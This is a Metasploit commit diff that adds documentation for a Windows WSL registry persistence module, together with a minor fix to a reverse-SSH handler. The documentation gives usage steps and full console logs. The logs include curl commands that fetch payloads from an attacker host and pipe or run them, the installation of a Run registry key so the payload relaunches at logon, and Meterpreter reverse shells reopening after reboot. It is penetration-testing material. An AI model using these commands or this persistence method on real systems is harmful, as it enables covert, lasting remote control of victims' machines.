Land #20701, adds windows WSL registry persistence module

msutovsky-r7 · web-flow · commit e2097ee1bc91 · 2025-11-20T15:15:22.000+01:00
Windows WSL registry persistence
diff --git a/documentation/modules/exploit/windows/persistence/wsl/registry.md b/documentation/modules/exploit/windows/persistence/wsl/registry.md
@@ -0,0 +1,168 @@
+## Vulnerable Application
+
+This module will install a payload in WSL and execute it at user
+logon or system startup via the registry value in "CurrentVersion\Run"
+or "RunOnce" (depending on privilege and selected method).
+The payload will be installed completely in registry.
+
+Staged payloads, like fetch payloads in linux X64 don't tend to work. The payload
+will ask for the stage, then submit the HTTP fetch request
+and when the payload is sent it doesn't execute.
+
+`cmd/linux/http/x64/meterpreter_reverse_tcp` and unix cmd payloads tend to work.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a shell on Windows
+3. Do: `use exploit/windows/persistence/wsl/registry`
+4. Do: `set session #`
+5. Do: `run`
+6. You should get a shell on user or system login.
+
+## Options
+
+### STARTUP
+
+Startup type for the persistent payload. Options are `USER` and `SYSTEM`, defaults to `USER`.
+
+### RUN_NAME
+
+The name to use for the `Run` key. Default: random
+
+### REG_KEY
+
+Registry Key To Install To. Options are `Run` and `RunOnce`. Defaults to `Run`
+
+### PAYLOAD_NAME
+
+The filename for the payload to be used on the target host (random by default).
+
+## Scenarios
+
+### Windows 10 1909 (10.0 Build 18363) User access
+
+Obtain original shell
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
+fetch_command => CURL
+resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
+fetch_pipe => true
+resource (/root/.msf4/msfconsole.rc)> set lport 4450
+lport => 4450
+resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
+FETCH_URIPATH => w3
+resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
+FETCH_FILENAME => mkaKJBzbDB
+resource (/root/.msf4/msfconsole.rc)> to_handler
+[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe
+
+[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
+[*] Payload Handler Started as Job 0
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg
+[*] Adding resource /w3
+[*] Started reverse TCP handler on 1.1.1.1:4450 
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
+[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg
+[*] Sending payload to 2.2.2.2 (curl/7.79.1)
+[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49747) at 2025-11-16 07:11:24 -0500
+
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : WIN10PROLICENSE
+OS              : Windows 10 1909 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: WIN10PROLICENSE\windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Persistence
+
+```
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/wsl/registry 
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/wsl/registry) > set session 1
+session => 1
+msf exploit(windows/persistence/wsl/registry) > set payload 
+Display all 403 possibilities? (y or n)
+msf exploit(windows/persistence/wsl/registry) > set payload cmd/linux/http/x64/meterpreter_reverse_tcp 
+payload => cmd/linux/http/x64/meterpreter_reverse_tcp
+msf exploit(windows/persistence/wsl/registry) > exploit
+[*] Command to run on remote host: curl -so ./OOrIkKMB http://1.1.1.1:8080/rnjdQxeDeP7M_rcLHU37ew;chmod +x ./OOrIkKMB;./OOrIkKMB&
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+msf exploit(windows/persistence/wsl/registry) > 
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /rnjdQxeDeP7M_rcLHU37ew
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[!] SESSION may not be compatible with this module:
+[!]  * incompatible session platform: windows. This module works with: Unix, Linux.
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Powershell detected on system
+[*] Checking registry write access to: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rdtGlT3MB3n0dVy
+[+] The target is vulnerable. Registry writable and WSL installed
+[*] Root path is HKCU
+[*] Enumerating WSL Instances
+WSL
+===
+
+#  Instance_Name  State    Version  Default
+-  -------------  -----    -------  -------
+1  Ubuntu         Stopped  1        true
+
+[*] Writing payload to: /tmp/DOgQVT
+[+] Payload wrote successfully
+[*] Installing run key
+[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\91xgjErF
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251116.2715/WIN10PROLICENSE_20251116.2715.rc
+```
+
+Reboot the system
+
+```
+[*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
+[*] Client 2.2.2.2 requested /rnjdQxeDeP7M_rcLHU37ew
+[*] Sending payload to 2.2.2.2 (curl/8.5.0)
+[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 2.2.2.2:49712) at 2025-11-16 07:29:39 -0500
+[-] Meterpreter session 2 is not valid and will be closed
+[*] 2.2.2.2 - Meterpreter session 2 closed.
+
+msf exploit(windows/persistence/wsl/registry) > sessions -i 3
+[*] Starting interaction with 3...
+
+meterpreter > getuid
+Server username: windows
+meterpreter > sysinfo
+Computer     : win10prolicensed.localdomain
+OS           : Ubuntu 24.04 (Linux 4.4.0-18362-Microsoft)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > background
+[*] Backgrounding session 3...
+msf exploit(windows/persistence/wsl/registry) > [*] 2.2.2.2 - Meterpreter session 3 closed.  Reason: Died
+
+[*] Client 2.2.2.2 requested /rnjdQxeDeP7M_rcLHU37ew
+[*] Sending payload to 2.2.2.2 (curl/8.5.0)
+[*] Meterpreter session 4 opened (1.1.1.1:4444 -> 2.2.2.2:49726) at 2025-11-16 07:36:17 -0500
+```
diff --git a/lib/msf/core/handler/reverse_ssh.rb b/lib/msf/core/handler/reverse_ssh.rb
@@ -59,7 +59,7 @@ def listener_uri(addr = datastore['ReverseListenerBindAddress'])
       def setup_handler
         # The current SSH server implementation does not support OpenSSL 3
         if OpenSSL::OPENSSL_LIBRARY_VERSION.start_with? 'OpenSSL 3'
-          raise RuntimeError, "ReverseSSH failed to load. OpenSSL version #{OpenSSL::VERSION} not supported."
+          raise "ReverseSSH failed to load. OpenSSL version #{OpenSSL::VERSION} not supported."
         end
 
         local_addr = nil
@@ -141,6 +141,8 @@ def create_session(ssh, opts = {})
       # Always wait at least 5 seconds for this payload (due to channel delays)
       #
       def wfs_delay
+        return 5 if datastore['WfsDelay'].nil?
+
         datastore['WfsDelay'] > 4 ? datastore['WfsDelay'] : 5
       end
       attr_accessor :service # :nodoc:
diff --git a/modules/exploits/windows/persistence/wsl/registry.rb b/modules/exploits/windows/persistence/wsl/registry.rb
